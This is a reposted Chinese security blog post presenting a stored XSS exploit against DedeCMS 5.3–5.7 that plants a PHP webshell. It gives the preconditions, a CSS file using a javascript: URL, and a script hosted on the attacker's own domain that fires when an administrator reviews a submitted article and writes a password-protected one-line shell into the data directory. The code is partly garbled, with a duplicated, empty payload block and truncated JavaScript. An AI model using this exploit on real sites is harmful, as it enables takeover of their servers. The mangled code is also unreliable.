dedecms xss 0day通杀所有版本 可getshell

没穿底裤 2020年1月1日01:03:57评论332 views字数 714阅读2分22秒阅读模式
摘要

洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表文章投稿,
内容如下填写:
[php]

洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表文章投稿,
内容如下填写:
[php]

[/php]

在你自己的网站0day5.com上新建xss.css内容如下:
[php]body{background-image:url('javascript:document.write("")') }[/php]

在你自己的网站xxx.com上新建xss.js 内容如下:
[php]
varrequest =false;
if(window.XMLHttpRequest){request =newXMLHttpRequest();
if(request.overrideMimeType){request.overrideMimeType('text/xml');}}
elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}
[/php]

当管理员审核这篇文章的时候,将自动在data目录生成一句话0day5.php。密码0day5。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日01:03:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dedecms xss 0day通杀所有版本 可getshellhttp://cn-sec.com/archives/75323.html

发表评论

匿名网友 填写信息